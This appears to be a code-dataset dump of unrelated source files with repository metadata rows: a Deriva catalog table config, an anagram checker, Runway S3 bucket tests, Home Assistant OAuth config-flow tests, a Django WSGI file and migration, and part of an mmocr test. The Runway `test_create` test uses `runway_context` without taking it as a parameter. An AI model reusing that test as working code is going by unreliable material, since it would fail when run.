            "inf" or "Infinity" means the end of the video.
    """

    content = proto.Field(proto.STRING, number=1)
    mime_type = proto.Field(proto.STRING, number=2)
    time_segment_start = proto.Field(proto.STRING, number=3)
    time_segment_end = proto.Field(proto.STRING, number=4)
__all__ = tuple(sorted(__protobuf__.manifest))
| [
"bazel-bot-development[bot]@users.noreply.github.com"
] | bazel-bot-development[bot]@users.noreply.github.com |
8a9a097acec7f7248d2a0353f0e6c921b0e9d855 | 7298d1692c6948f0880e550d6100c63a64ce3ea1 | /deriva-annotations/catalog1/catalog-configs/Vocab/ihm_external_reference_info_reference_type_term.py | bfd555a03816d7b8e5783424965c8f5f426649a4 | [] | no_license | informatics-isi-edu/protein-database | b7684b3d08dbf22c1e7c4a4b8460248c6f0d2c6d | ce4be1bf13e6b1c22f3fccbb513824782609991f | refs/heads/master | 2023-08-16T10:24:10.206574 | 2023-07-25T23:10:42 | 2023-07-25T23:10:42 | 174,095,941 | 2 | 0 | null | 2023-06-16T19:44:43 | 2019-03-06T07:39:14 | Python | UTF-8 | Python | false | false | 6,342 | py | import argparse
from deriva.core import ErmrestCatalog, AttrDict, get_credential, DerivaPathError
from deriva.utils.catalog.components.deriva_model import DerivaCatalog
import deriva.core.ermrest_model as em
from deriva.core.ermrest_config import tag as chaise_tags
from deriva.utils.catalog.manage.update_catalog import CatalogUpdater, parse_args
# Globus Auth group URLs referenced by the ACL definitions further down.
groups = {
    'pdb-reader': 'https://auth.globus.org/8875a770-3c40-11e9-a8c8-0ee7d80087ee',
    'pdb-writer': 'https://auth.globus.org/c94a1e5c-3c40-11e9-a5d1-0aacc65bfe9a',
    'pdb-admin': 'https://auth.globus.org/0b98092c-3c41-11e9-a8c8-0ee7d80087ee',
    'pdb-curator': 'https://auth.globus.org/eef3e02a-3c40-11e9-9276-0edc9bdd56a6',
    'isrd-staff': 'https://auth.globus.org/176baec4-ed26-11e5-8e88-22000ab4b42b'
}
# Target table and schema inside the Deriva catalog.
table_name = 'ihm_external_reference_info_reference_type_term'
schema_name = 'Vocab'
# Chaise UI annotations per column; the RCT/RMT/RCB/RMB system columns are
# display-renamed and marked generated/immutable so users cannot edit them.
column_annotations = {
    'RCT': {
        chaise_tags.display: {
            'name': 'Creation Time'
        },
        chaise_tags.generated: None,
        chaise_tags.immutable: None
    },
    'RMT': {
        chaise_tags.display: {
            'name': 'Last Modified Time'
        },
        chaise_tags.generated: None,
        chaise_tags.immutable: None
    },
    'RCB': {
        chaise_tags.display: {
            'name': 'Created By'
        },
        chaise_tags.generated: None,
        chaise_tags.immutable: None
    },
    'RMB': {
        chaise_tags.display: {
            'name': 'Modified By'
        },
        chaise_tags.generated: None,
        chaise_tags.immutable: None
    },
    'ID': {},
    'URI': {},
    'Name': {},
    'Description': {},
    'Synonyms': {},
    'Owner': {}
}
# Human-readable per-column comments stored in the catalog model.
column_comment = {
    'ID': 'The preferred Compact URI (CURIE) for this term.',
    'URI': 'The preferred URI for this term.',
    'Name': 'The preferred human-readable name for this term.',
    'Description': 'A longer human-readable description of this term.',
    'Synonyms': 'Alternate human-readable names for this term.',
    'Owner': 'Group that can update the record.'
}
# No column-level ACLs or ACL bindings for this table.
column_acls = {}
column_acl_bindings = {}
# ERMrest column definitions; ID/URI default to templates expanded from the
# row's RID at insert time.
column_defs = [
    em.Column.define(
        'ID',
        em.builtin_types['ermrest_curie'],
        nullok=False,
        default='PDB:{RID}',
        comment=column_comment['ID'],
    ),
    em.Column.define(
        'URI',
        em.builtin_types['ermrest_uri'],
        nullok=False,
        default='/id/{RID}',
        comment=column_comment['URI'],
    ),
    em.Column.define(
        'Name', em.builtin_types['text'], nullok=False, comment=column_comment['Name'],
    ),
    em.Column.define(
        'Description',
        em.builtin_types['markdown'],
        nullok=False,
        comment=column_comment['Description'],
    ),
    em.Column.define('Synonyms', em.builtin_types['text[]'], comment=column_comment['Synonyms'],
                     ),
    em.Column.define('Owner', em.builtin_types['text'], comment=column_comment['Owner'],
                     ),
]
# Column ordering for every Chaise context ('*'); fkey columns are shown via
# their constraint names so Chaise renders the linked rows.
visible_columns = {
    '*': [
        'RID', 'Name', 'Description', 'ID', 'URI',
        ['Vocab', 'ihm_external_reference_info_reference_type_term_RCB_fkey'],
        ['Vocab', 'ihm_external_reference_info_reference_type_term_RMB_fkey'], 'RCT', 'RMT',
        ['Vocab', 'ihm_external_reference_info_reference_type_term_Owner_fkey']
    ]
}
# Render each row by its Name column in Chaise.
table_display = {'row_name': {'row_markdown_pattern': '{{{Name}}}'}}
table_annotations = {
    chaise_tags.table_display: table_display,
    chaise_tags.visible_columns: visible_columns,
}
table_comment = 'A set of controlled vocabular terms.'
table_acls = {}
# Rows are updatable/deletable by their Owner group or by their creator (RCB).
table_acl_bindings = {
    'self_service_group': {
        'types': ['update', 'delete'],
        'scope_acl': ['*'],
        'projection': ['Owner'],
        'projection_type': 'acl'
    },
    'self_service_creator': {
        'types': ['update', 'delete'],
        'scope_acl': ['*'],
        'projection': ['RCB'],
        'projection_type': 'acl'
    }
}
# Uniqueness constraints: RID (system), ID and URI must each be unique.
key_defs = [
    em.Key.define(
        ['RID'],
        constraint_names=[('Vocab', 'ihm_external_reference_info_reference_type_term_RIDkey1')],
    ),
    em.Key.define(
        ['ID'],
        constraint_names=[('Vocab', 'ihm_external_reference_info_reference_type_term_IDkey1')],
    ),
    em.Key.define(
        ['URI'],
        constraint_names=[('Vocab', 'ihm_external_reference_info_reference_type_term_URIkey1')],
    ),
]
# Foreign keys: Owner points at a catalog group (only curators may set it to a
# group the user is not in — see acls/acl_bindings); RCB/RMB reference clients.
fkey_defs = [
    em.ForeignKey.define(
        ['Owner'],
        'public',
        'Catalog_Group', ['ID'],
        constraint_names=[('Vocab', 'ihm_external_reference_info_reference_type_term_Owner_fkey')],
        acls={
            'insert': [groups['pdb-curator']],
            'update': [groups['pdb-curator']]
        },
        acl_bindings={
            'set_owner': {
                'types': ['update', 'insert'],
                'scope_acl': ['*'],
                'projection': ['ID'],
                'projection_type': 'acl'
            }
        },
    ),
    em.ForeignKey.define(
        ['RCB'],
        'public',
        'ERMrest_Client', ['ID'],
        constraint_names=[('Vocab', 'ihm_external_reference_info_reference_type_term_RCB_fkey')],
        acls={
            'insert': ['*'],
            'update': ['*']
        },
    ),
    em.ForeignKey.define(
        ['RMB'],
        'public',
        'ERMrest_Client', ['ID'],
        constraint_names=[('Vocab', 'ihm_external_reference_info_reference_type_term_RMB_fkey')],
        acls={
            'insert': ['*'],
            'update': ['*']
        },
    ),
]
# Assemble the complete table definition; provide_system=True adds the
# standard RID/RCT/RMT/RCB/RMB system columns.
table_def = em.Table.define(
    table_name,
    column_defs=column_defs,
    key_defs=key_defs,
    fkey_defs=fkey_defs,
    annotations=table_annotations,
    acls=table_acls,
    acl_bindings=table_acl_bindings,
    comment=table_comment,
    provide_system=True
)
def main(catalog, mode, replace=False, really=False):
    """Apply the table definition above to *catalog*.

    Re-attaches the per-column annotations and comments to ``table_def``
    and delegates the create/update work to ``CatalogUpdater``.
    """
    table_def['column_annotations'] = column_annotations
    table_def['column_comment'] = column_comment
    CatalogUpdater(catalog).update_table(
        mode, schema_name, table_def, replace=replace, really=really)
if __name__ == "__main__":
    # Defaults for the target catalog; parse_args may override both from CLI.
    host = 'pdb.isrd.isi.edu'
    catalog_id = 1
    mode, replace, host, catalog_id = parse_args(host, catalog_id, is_table=True)
    catalog = DerivaCatalog(host, catalog_id=catalog_id, validate=False)
    main(catalog, mode, replace)
| [
"brinda.vallat@rcsb.org"
] | brinda.vallat@rcsb.org |
97590902ea45bc7e04b8feaeccdb37e092426808 | 3520f9f1b6d804a6d95233493972bf04dca67fb4 | /revisited_2021/math_and_string/valid_anagram.py | 0d690178b7d6f34a5c35933bc51c1c498ce42777 | [] | no_license | Shiv2157k/leet_code | 8691a470148809f0a7077434abdc689f33958f34 | 65cc78b5afa0db064f9fe8f06597e3e120f7363d | refs/heads/master | 2023-06-17T02:59:20.892561 | 2021-07-05T16:42:58 | 2021-07-05T16:42:58 | 266,856,709 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 709 | py |
class Anagram:
    """Check whether two strings are anagrams of each other."""

    def is_valid(self, s: str, t: str) -> bool:
        """Return True if *t* is an anagram of *s*.

        Uses a dict of character counts instead of a fixed 26-slot array,
        so any characters are handled (uppercase, digits, punctuation,
        Unicode); the array version raised IndexError for characters
        outside 'a'..'z'.

        Approach: hash table of character counts.
        Time Complexity: O(n)
        Space Complexity: O(k), k = number of distinct characters
        :param s: first string
        :param t: second string
        :return: True if t is a rearrangement of s, else False
        """
        if len(s) != len(t):
            return False
        counts = {}
        for ch in s:
            counts[ch] = counts.get(ch, 0) + 1
        for ch in t:
            remaining = counts.get(ch, 0) - 1
            if remaining < 0:
                # t uses ch more often than s does -> not an anagram.
                return False
            counts[ch] = remaining
        # Equal lengths and no count went negative => all counts are zero.
        return True
if __name__ == "__main__":
    # Manual smoke checks; expected output: True, True, False.
    anagram = Anagram()
    print(anagram.is_valid("rat", "tar"))
    print(anagram.is_valid("", ""))
    print(anagram.is_valid("a", "b"))
"shiv2157.k@gmail.com"
] | shiv2157.k@gmail.com |
218920ee7ecdcf630aa9ccd3a3b4fddcfa2ffa7e | 5608a9cd3bec8cab1c3f9d7f42896107b78593cc | /tests/unit/core/providers/aws/s3/test_bucket.py | f85370b5252ce422d7ef0108365dfc1490f475ea | [
"Apache-2.0"
] | permissive | troyready/runway | cdee6d94f42173c8aa0bd414620b68be36a510aa | 4fd299961a4b73df39e14f4f19a7236f7be17dd8 | refs/heads/master | 2021-06-18T16:05:30.712211 | 2021-01-14T01:44:32 | 2021-01-14T01:44:32 | 151,314,626 | 0 | 0 | Apache-2.0 | 2018-10-02T19:55:09 | 2018-10-02T19:55:08 | null | UTF-8 | Python | false | false | 8,634 | py | """Test runway.core.providers.aws.s3._bucket."""
# pylint: disable=no-self-use
import logging
from mock import MagicMock
from runway.core.providers.aws import BaseResponse
from runway.core.providers.aws.s3 import Bucket
from runway.http_backport import HTTPStatus
# Import path of the module under test (useful as a mock.patch target).
MODULE = "runway.core.providers.aws.s3._bucket"
class TestBucket(object):
    """Test runway.core.providers.aws.s3._bucket.Bucket."""

    def test_client(self):
        """Test client."""
        # Chain of mocks: context -> session -> boto3 s3 client.
        mock_ctx = MagicMock()
        mock_session = MagicMock()
        mock_client = MagicMock()
        mock_ctx.get_session.return_value = mock_session
        mock_session.client.return_value = mock_client
        bucket = Bucket(mock_ctx, "test-bucket", region="us-west-2")
        assert bucket.client == mock_client
        # The region passed to Bucket must be forwarded to get_session.
        mock_ctx.get_session.assert_called_once_with(region="us-west-2")
        mock_session.client.assert_called_once_with("s3")
    def test_create(self):
        """Test create."""
        stubber = runway_context.add_stubber("s3")
        bucket = Bucket(runway_context, "test-bucket")
        # head_bucket 404 => bucket does not exist yet, so create proceeds.
        stubber.add_client_error(
            "head_bucket",
            "NoSuchBucket",
            "Not Found",
            404,
            expected_params={"Bucket": "test-bucket"},
        )
        stubber.add_response(
            "create_bucket",
            {"Location": "us-east-1"},
            {"ACL": "private", "Bucket": "test-bucket"},
        )
        with stubber:
            assert bucket.create(ACL="private")
            stubber.assert_no_pending_responses()
    def test_create_exists(self, caplog, runway_context):
        """Test create with exists=True."""
        caplog.set_level(logging.DEBUG, logger="runway.core.providers.aws.s3.bucket")
        stubber = runway_context.add_stubber("s3", region="us-west-2")
        bucket = Bucket(runway_context, "test-bucket", region="us-west-2")
        # head_bucket succeeding means the bucket exists; create is a no-op.
        stubber.add_response(
            "head_bucket",
            {"ResponseMetadata": {"HostId": "test", "HTTPStatusCode": 200}},
            {"Bucket": "test-bucket"},
        )
        with stubber:
            assert not bucket.create()
            stubber.assert_no_pending_responses()
        assert "bucket already exists" in "\n".join(caplog.messages)
    def test_create_forbidden(self, caplog, runway_context):
        """Test create with forbidden=True."""
        caplog.set_level(logging.DEBUG, logger="runway.core.providers.aws.s3.bucket")
        stubber = runway_context.add_stubber("s3", region="us-west-2")
        bucket = Bucket(runway_context, "test-bucket", region="us-west-2")
        # 403 on head_bucket => no permission; create must bail out.
        stubber.add_client_error(
            "head_bucket",
            "AccessDenied",
            "Forbidden",
            403,
            expected_params={"Bucket": "test-bucket"},
        )
        with stubber:
            assert not bucket.create()
            stubber.assert_no_pending_responses()
        assert "access denied" in "\n".join(caplog.messages)
    def test_create_us_west_2(self, runway_context):
        """Test create with region=us-west-2."""
        stubber = runway_context.add_stubber("s3", region="us-west-2")
        bucket = Bucket(runway_context, "test-bucket", region="us-west-2")
        stubber.add_client_error(
            "head_bucket",
            "NoSuchBucket",
            "The specified bucket does not exist.",
            404,
            expected_params={"Bucket": "test-bucket"},
        )
        # Non us-east-1 regions require an explicit CreateBucketConfiguration.
        stubber.add_response(
            "create_bucket",
            {"Location": "us-east-1"},
            {
                "Bucket": "test-bucket",
                "CreateBucketConfiguration": {"LocationConstraint": "us-west-2"},
            },
        )
        with stubber:
            assert bucket.create()
            stubber.assert_no_pending_responses()
    def test_enable_versioning(self, runway_context):
        """Test enable_versioning."""
        stubber = runway_context.add_stubber("s3")
        bucket = Bucket(runway_context, "test-bucket")
        stubber.add_response(
            "get_bucket_versioning",
            {"Status": "Suspended", "MFADelete": "Enabled"},
            {"Bucket": "test-bucket"},
        )
        # Status flips to Enabled while the existing MFADelete setting is kept.
        stubber.add_response(
            "put_bucket_versioning",
            {},
            {
                "Bucket": "test-bucket",
                "VersioningConfiguration": {
                    "Status": "Enabled",
                    "MFADelete": "Enabled",
                },
            },
        )
        with stubber:
            bucket.enable_versioning()
            stubber.assert_no_pending_responses()
    def test_enable_versioning_skipped(self, caplog, runway_context):
        """Test enable_versioning with Status=Enabled."""
        caplog.set_level(logging.DEBUG, logger="runway.core.providers.aws.s3.bucket")
        stubber = runway_context.add_stubber("s3")
        bucket = Bucket(runway_context, "test-bucket")
        # Already enabled: no put_bucket_versioning call is stubbed or expected.
        stubber.add_response(
            "get_bucket_versioning", {"Status": "Enabled"}, {"Bucket": "test-bucket"},
        )
        with stubber:
            bucket.enable_versioning()
            stubber.assert_no_pending_responses()
        assert (
            'did not modify versioning policy for bucket "test-bucket"; already enabled'
        ) in caplog.messages
    def test_exists(self, monkeypatch, runway_context):
        """Test not_found."""
        mock_head = MagicMock(spec=BaseResponse())
        monkeypatch.setattr(Bucket, "head", mock_head)
        bucket = Bucket(runway_context, "test-bucket")
        mock_head.metadata.not_found = True
        assert not bucket.exists  # initial value
        mock_head.metadata.not_found = False
        # exists is derived from the cached not_found property, so it does not
        # change until the cache is invalidated with `del`.
        assert not bucket.exists  # cached value
        del bucket.not_found
        assert bucket.exists  # updated value
    def test_forbidden(self, monkeypatch, runway_context):
        """Test forbidden."""
        mock_head = MagicMock(spec=BaseResponse())
        monkeypatch.setattr(Bucket, "head", mock_head)
        bucket = Bucket(runway_context, "test-bucket")
        mock_head.metadata.forbidden = True
        assert bucket.forbidden  # initial value
        mock_head.metadata.forbidden = False
        # Cached property: stale until deleted, then recomputed from head.
        assert bucket.forbidden  # cached value
        del bucket.forbidden
        assert not bucket.forbidden  # updated value
    def test_get_versioning(self, runway_context):
        """Test get_versioning."""
        stubber = runway_context.add_stubber("s3")
        bucket = Bucket(runway_context, "test-bucket")
        response = {"Status": "Enabled", "MFADelete": "Enabled"}
        stubber.add_response(
            "get_bucket_versioning", response, {"Bucket": "test-bucket"}
        )
        with stubber:
            assert bucket.get_versioning() == response
            stubber.assert_no_pending_responses()
    def test_head(self, runway_context):
        """Test head."""
        stubber = runway_context.add_stubber("s3")
        bucket = Bucket(runway_context, "test-bucket")
        stubber.add_response(
            "head_bucket",
            {"ResponseMetadata": {"HostId": "test", "HTTPStatusCode": 200}},
            {"Bucket": "test-bucket"},
        )
        with stubber:
            assert bucket.head.metadata.host_id == "test"
            assert bucket.head.metadata.http_status_code == HTTPStatus.OK
            stubber.assert_no_pending_responses()
    def test_head_clienterror(self, caplog, runway_context):
        """Test head with ClientError."""
        caplog.set_level(logging.DEBUG, logger="runway.core.providers.aws.s3.bucket")
        stubber = runway_context.add_stubber("s3")
        bucket = Bucket(runway_context, "test-bucket")
        stubber.add_client_error(
            "head_bucket",
            "AccessDenied",
            "Forbidden",
            403,
            expected_params={"Bucket": "test-bucket"},
        )
        # The error is logged and surfaced through the response metadata
        # rather than raised.
        with stubber:
            assert bucket.head.metadata.http_status_code == HTTPStatus.FORBIDDEN
            stubber.assert_no_pending_responses()
        assert "received an error from AWS S3" in "\n".join(caplog.messages)
    def test_not_found(self, monkeypatch, runway_context):
        """Test not_found."""
        mock_head = MagicMock(spec=BaseResponse())
        monkeypatch.setattr(Bucket, "head", mock_head)
        bucket = Bucket(runway_context, "test-bucket")
        mock_head.metadata.not_found = True
        assert bucket.not_found  # initial value
        mock_head.metadata.not_found = False
        # Cached property: stale until deleted, then recomputed from head.
        assert bucket.not_found  # cached value
        del bucket.not_found
        assert not bucket.not_found  # updated value
| [
"kyle@finley.sh"
] | kyle@finley.sh |
c0d577a00e14252c2e94df73db2729d4a5836254 | 5963c12367490ffc01c9905c028d1d5480078dec | /tests/components/home_plus_control/test_config_flow.py | 4a7dbd3d3ee4e3f02c6a53aa014845151bec6ce1 | [
"Apache-2.0"
] | permissive | BenWoodford/home-assistant | eb03f73165d11935e8d6a9756272014267d7d66a | 2fee32fce03bc49e86cf2e7b741a15621a97cce5 | refs/heads/dev | 2023-03-05T06:13:30.354545 | 2021-07-18T09:51:53 | 2021-07-18T09:51:53 | 117,122,037 | 11 | 6 | Apache-2.0 | 2023-02-22T06:16:51 | 2018-01-11T16:10:19 | Python | UTF-8 | Python | false | false | 6,431 | py | """Test the Legrand Home+ Control config flow."""
from unittest.mock import patch
from homeassistant import config_entries, data_entry_flow, setup
from homeassistant.components.home_plus_control.const import (
CONF_SUBSCRIPTION_KEY,
DOMAIN,
OAUTH2_AUTHORIZE,
OAUTH2_TOKEN,
)
from homeassistant.const import CONF_CLIENT_ID, CONF_CLIENT_SECRET
from homeassistant.helpers import config_entry_oauth2_flow
from tests.common import MockConfigEntry
from tests.components.home_plus_control.conftest import (
CLIENT_ID,
CLIENT_SECRET,
SUBSCRIPTION_KEY,
)
async def test_full_flow(
    hass, aiohttp_client, aioclient_mock, current_request_with_host
):
    """Check full flow."""
    assert await setup.async_setup_component(
        hass,
        "home_plus_control",
        {
            "home_plus_control": {
                CONF_CLIENT_ID: CLIENT_ID,
                CONF_CLIENT_SECRET: CLIENT_SECRET,
                CONF_SUBSCRIPTION_KEY: SUBSCRIPTION_KEY,
            },
        },
    )
    result = await hass.config_entries.flow.async_init(
        "home_plus_control", context={"source": config_entries.SOURCE_USER}
    )
    # Build the OAuth2 `state` JWT the external-step URL is expected to carry.
    state = config_entry_oauth2_flow._encode_jwt(  # pylint: disable=protected-access
        hass,
        {
            "flow_id": result["flow_id"],
            "redirect_uri": "https://example.com/auth/external/callback",
        },
    )
    assert result["type"] == data_entry_flow.RESULT_TYPE_EXTERNAL_STEP
    assert result["step_id"] == "auth"
    assert result["url"] == (
        f"{OAUTH2_AUTHORIZE}?response_type=code&client_id={CLIENT_ID}"
        "&redirect_uri=https://example.com/auth/external/callback"
        f"&state={state}"
    )
    # Simulate the provider redirecting back with an authorization code.
    client = await aiohttp_client(hass.http.app)
    resp = await client.get(f"/auth/external/callback?code=abcd&state={state}")
    assert resp.status == 200
    assert resp.headers["content-type"] == "text/html; charset=utf-8"
    # Stub the token-exchange endpoint.
    aioclient_mock.post(
        OAUTH2_TOKEN,
        json={
            "refresh_token": "mock-refresh-token",
            "access_token": "mock-access-token",
            "type": "Bearer",
            "expires_in": 60,
        },
    )
    with patch(
        "homeassistant.components.home_plus_control.async_setup_entry",
        return_value=True,
    ) as mock_setup:
        result = await hass.config_entries.flow.async_configure(result["flow_id"])
        await hass.async_block_till_done()
    # The flow must finish by creating a single entry holding the tokens.
    assert result["type"] == data_entry_flow.RESULT_TYPE_CREATE_ENTRY
    assert result["title"] == "Home+ Control"
    config_data = result["data"]
    assert config_data["token"]["refresh_token"] == "mock-refresh-token"
    assert config_data["token"]["access_token"] == "mock-access-token"
    assert len(hass.config_entries.async_entries(DOMAIN)) == 1
    assert len(mock_setup.mock_calls) == 1
async def test_abort_if_entry_in_progress(hass, current_request_with_host):
    """Check flow abort when an entry is already in progress."""
    assert await setup.async_setup_component(
        hass,
        "home_plus_control",
        {
            "home_plus_control": {
                CONF_CLIENT_ID: CLIENT_ID,
                CONF_CLIENT_SECRET: CLIENT_SECRET,
                CONF_SUBSCRIPTION_KEY: SUBSCRIPTION_KEY,
            },
        },
    )
    # Start one flow
    result = await hass.config_entries.flow.async_init(
        "home_plus_control", context={"source": config_entries.SOURCE_USER}
    )
    # Attempt to start another flow; the second must abort immediately.
    result = await hass.config_entries.flow.async_init(
        "home_plus_control", context={"source": config_entries.SOURCE_USER}
    )
    assert result["type"] == data_entry_flow.RESULT_TYPE_ABORT
    assert result["reason"] == "already_in_progress"
async def test_abort_if_entry_exists(hass, current_request_with_host):
    """Check flow abort when an entry already exists."""
    # Pre-register a config entry so the integration is already set up.
    existing_entry = MockConfigEntry(domain=DOMAIN)
    existing_entry.add_to_hass(hass)
    assert await setup.async_setup_component(
        hass,
        "home_plus_control",
        {
            "home_plus_control": {
                CONF_CLIENT_ID: CLIENT_ID,
                CONF_CLIENT_SECRET: CLIENT_SECRET,
                CONF_SUBSCRIPTION_KEY: SUBSCRIPTION_KEY,
            },
            "http": {},
        },
    )
    # Only one instance of this integration is allowed.
    result = await hass.config_entries.flow.async_init(
        "home_plus_control", context={"source": config_entries.SOURCE_USER}
    )
    assert result["type"] == data_entry_flow.RESULT_TYPE_ABORT
    assert result["reason"] == "single_instance_allowed"
async def test_abort_if_invalid_token(
    hass, aiohttp_client, aioclient_mock, current_request_with_host
):
    """Check flow abort when the token has an invalid value."""
    assert await setup.async_setup_component(
        hass,
        "home_plus_control",
        {
            "home_plus_control": {
                CONF_CLIENT_ID: CLIENT_ID,
                CONF_CLIENT_SECRET: CLIENT_SECRET,
                CONF_SUBSCRIPTION_KEY: SUBSCRIPTION_KEY,
            },
        },
    )
    result = await hass.config_entries.flow.async_init(
        "home_plus_control", context={"source": config_entries.SOURCE_USER}
    )
    state = config_entry_oauth2_flow._encode_jwt(  # pylint: disable=protected-access
        hass,
        {
            "flow_id": result["flow_id"],
            "redirect_uri": "https://example.com/auth/external/callback",
        },
    )
    assert result["type"] == data_entry_flow.RESULT_TYPE_EXTERNAL_STEP
    assert result["step_id"] == "auth"
    assert result["url"] == (
        f"{OAUTH2_AUTHORIZE}?response_type=code&client_id={CLIENT_ID}"
        "&redirect_uri=https://example.com/auth/external/callback"
        f"&state={state}"
    )
    client = await aiohttp_client(hass.http.app)
    resp = await client.get(f"/auth/external/callback?code=abcd&state={state}")
    assert resp.status == 200
    assert resp.headers["content-type"] == "text/html; charset=utf-8"
    # Token endpoint returns a non-integer expires_in, which must be rejected.
    aioclient_mock.post(
        OAUTH2_TOKEN,
        json={
            "refresh_token": "mock-refresh-token",
            "access_token": "mock-access-token",
            "type": "Bearer",
            "expires_in": "non-integer",
        },
    )
    result = await hass.config_entries.flow.async_configure(result["flow_id"])
    assert result["type"] == data_entry_flow.RESULT_TYPE_ABORT
    assert result["reason"] == "oauth_error"
| [
"noreply@github.com"
] | BenWoodford.noreply@github.com |
64ab6dc9d426016042fc73847036810389e9d621 | 1f244254465ce36f116b7d1c255f9a9ae9594bb4 | /typeidea/typeidea/wsgi.py | 859bfc426728341b7d6955eef2c8ef45d9865831 | [] | no_license | sunye088/typeidea | a45e7093b3b553fd38a5a6ba1971a7e3651cb161 | 2b84392e926fd72b1975947626db7362f0729a5c | refs/heads/master | 2023-04-29T15:20:18.049406 | 2019-11-30T13:31:39 | 2019-11-30T13:31:39 | 226,258,490 | 0 | 0 | null | 2023-04-21T20:41:54 | 2019-12-06T06:10:25 | Python | UTF-8 | Python | false | false | 532 | py | """
WSGI config for typeidea project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
# Original single-settings configuration, superseded by the per-profile
# selection below:
# os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'typeidea.settings')
# Pick the settings module from the TYPEIDEA_PROFILE env var (default: develop),
# e.g. typeidea.settings.develop or typeidea.settings.product.
profile =os.environ.get('TYPEIDEA_PROFILE', 'develop')
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "typeidea.settings.%s" % profile)
# WSGI entry point used by the application server.
application = get_wsgi_application()
| [
"root@localhost.localdomain"
] | root@localhost.localdomain |
cedff764c6d15c2ce22525b3220ee19a35077ac5 | 2f98aa7e5bfc2fc5ef25e4d5cfa1d7802e3a7fae | /python/python_13033.py | 8a6142db23b900da6715c215e263e247e680ca0f | [] | no_license | AK-1121/code_extraction | cc812b6832b112e3ffcc2bb7eb4237fd85c88c01 | 5297a4a3aab3bb37efa24a89636935da04a1f8b6 | refs/heads/master | 2020-05-23T08:04:11.789141 | 2015-10-22T19:19:40 | 2015-10-22T19:19:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 87 | py | # How to get POST variables in Python, when using gevent?
environ['wsgi.input'].read()
| [
"ubuntu@ip-172-31-7-228.us-west-2.compute.internal"
] | ubuntu@ip-172-31-7-228.us-west-2.compute.internal |
4bc76b786fe6931ca452ac6acf19df76b08600dd | 2898e585a2396738e49e33d322e8c65c823e6cf8 | /content/migrations/0073_comment.py | 0db929fda7cd4c263f7df602e0253eea7adf4179 | [] | no_license | kshutashvili/carshops | 4a4f384856c7cae6d09c9ca6e8b6c703ab88be80 | 885c6ed85d33c1cc9333ef9d224a3000b08959dc | refs/heads/master | 2022-12-12T12:50:49.618195 | 2018-02-22T18:04:00 | 2018-02-22T18:04:00 | 203,865,092 | 0 | 0 | null | 2022-11-22T02:24:12 | 2019-08-22T20:06:14 | JavaScript | UTF-8 | Python | false | false | 2,007 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.3 on 2018-02-21 15:32
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
import mptt.fields
class Migration(migrations.Migration):
    """Auto-generated migration adding the MPTT-backed ``Comment`` model.

    lft/rght/tree_id/level are django-mptt bookkeeping columns; ``parent``
    enables threaded (nested) comments and ``product`` ties each comment to
    a product.
    """
    dependencies = [
        ('content', '0072_auto_20180220_1531'),
    ]
    operations = [
        migrations.CreateModel(
            name='Comment',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=64, verbose_name='\u0418\u043c\u044f \u0442\u043e\u0433\u043e, \u043a\u0442\u043e \u043e\u0441\u0442\u0430\u0432\u0438\u043b \u043a\u043e\u043c\u043c\u0435\u043d\u0442\u0430\u0440\u0438\u0439')),
                ('date', models.DateField(auto_now_add=True, verbose_name='\u0414\u0430\u0442\u0430')),
                ('content', models.TextField(verbose_name='\u041a\u043e\u043c\u043c\u0435\u043d\u0442\u0430\u0440\u0438\u0439')),
                ('lft', models.PositiveIntegerField(db_index=True, editable=False)),
                ('rght', models.PositiveIntegerField(db_index=True, editable=False)),
                ('tree_id', models.PositiveIntegerField(db_index=True, editable=False)),
                ('level', models.PositiveIntegerField(db_index=True, editable=False)),
                ('parent', mptt.fields.TreeForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='subitems', to='content.Comment', verbose_name='\u0420\u043e\u0434\u0438\u0442\u0435\u043b\u044c')),
                ('product', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='comments', to='content.Product', verbose_name='\u0422\u043e\u0432\u0430\u0440')),
            ],
            options={
                'verbose_name': '\u041e\u0442\u0437\u044b\u0432',
                'verbose_name_plural': '\u041e\u0442\u0437\u044b\u0432\u044b',
            },
        ),
    ]
| [
"vetal969696@gmail.com"
] | vetal969696@gmail.com |
c6f06eb98d128fd78f6d7854db6a54d8e17d525b | e4fcd551a9d83e37a2cd6d5a2b53a3cc397ccb10 | /codes/eval_metrics/writing/mmocr/tests/test_datasets/test_preparers/test_parsers/test_wildreceipt_parsers.py | f4e5510db441116c73cc4881d23d270c83338ff1 | [
"Apache-2.0"
] | permissive | eslambakr/HRS_benchmark | 20f32458a47c6e1032285b44e70cf041a64f842c | 9f153d8c71d1119e4b5c926b899bb556a6eb8a59 | refs/heads/main | 2023-08-08T11:57:26.094578 | 2023-07-22T12:24:51 | 2023-07-22T12:24:51 | 597,550,499 | 33 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,991 | py | # Copyright (c) OpenMMLab. All rights reserved.
import json
import os.path as osp
import tempfile
import unittest
from mmocr.datasets.preparers.parsers.wildreceipt_parser import (
WildreceiptKIEAnnParser, WildreceiptTextDetAnnParser)
from mmocr.utils import list_to_file
class TestWildReceiptParsers(unittest.TestCase):
    """Tests for the wildreceipt text-detection and KIE annotation parsers."""

    def setUp(self) -> None:
        # Build a one-line JSONL annotation file in a temp dir: one sample with
        # two boxes, the second labelled 0 (background/other -> ignored).
        self.root = tempfile.TemporaryDirectory()
        fake_sample = dict(
            file_name='test.jpg',
            height=100,
            width=100,
            annotations=[
                dict(
                    box=[
                        550.0, 190.0, 937.0, 190.0, 937.0, 104.0, 550.0, 104.0
                    ],
                    text='test',
                    label=1,
                ),
                dict(
                    box=[
                        1048.0, 211.0, 1074.0, 211.0, 1074.0, 196.0, 1048.0,
                        196.0
                    ],
                    text='ATOREMGRTOMMILAZZO',
                    label=0,
                )
            ])
        fake_sample = [json.dumps(fake_sample)]
        self.anno = osp.join(self.root.name, 'wildreceipt.txt')
        list_to_file(self.anno, fake_sample)
